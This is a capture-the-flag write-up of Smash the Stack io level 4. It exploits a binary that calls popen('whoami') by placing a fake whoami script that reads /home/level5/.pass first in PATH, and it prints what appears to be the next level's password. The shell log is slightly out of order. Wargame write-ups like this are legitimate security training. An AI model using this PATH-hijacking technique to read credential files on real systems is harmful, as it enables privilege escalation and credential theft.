SMASH THE STACK LEVEL4
Date: December 3, 2014
level 4

```
level4@io:~$ cd /levels/
level4@io:/levels$ ./level04
Welcome level5
level4@io:/levels$ ./level04 d
Welcome level5
level4@io:/levels$ ./level04 $(python -c "print 'A' * 1024")
Welcome level5
```
So I will read the code:

```c
#include <stdio.h>

int main() {
    char username[1024];
    /* popen() hands the string to /bin/sh, which finds "whoami" via $PATH */
    FILE* f = popen("whoami","r");
    fgets(username, sizeof(username), f);
    printf("Welcome %s", username);
    return 0;
}
```
popen executes whoami and returns its output as the stream f.
fgets reads that output into username.
printf prints the output.
A very simple one.

I don't think it needs an overflow.

I can trick the program into reading /home/level5/.pass, because it runs the command whoami by name, and that command is located on the system through $PATH. So this is the point.

I will create a new file, /tmp/level04/whoami, with the same name as the command. Its content:

```
cat /home/level5/.pass
```

So when the program runs my whoami, it reads the password.

For that I have to put /tmp/level04 in my PATH variable, and it has to come before the other bin directories so that it is searched first.
```
level4@io:/levels$ echo $PATH
/tmp/level04/:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
level4@io:/levels$ whoami
level4
level4@io:/levels$ mkdir /tmp/level04
level4@io:/levels$ vi /tmp/level04/whoami
level4@io:/levels$ echo $PATH
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
level4@io:/levels$ export PATH=/tmp/level04/:$PATH
level4@io:/levels$ whoami
level4
```

```
level4@io:/levels$ chmod +x /tmp/level04/whoami
level4@io:/levels$ ./level04
Welcome LOoCy5PbKi63qXTh
```
very simple for me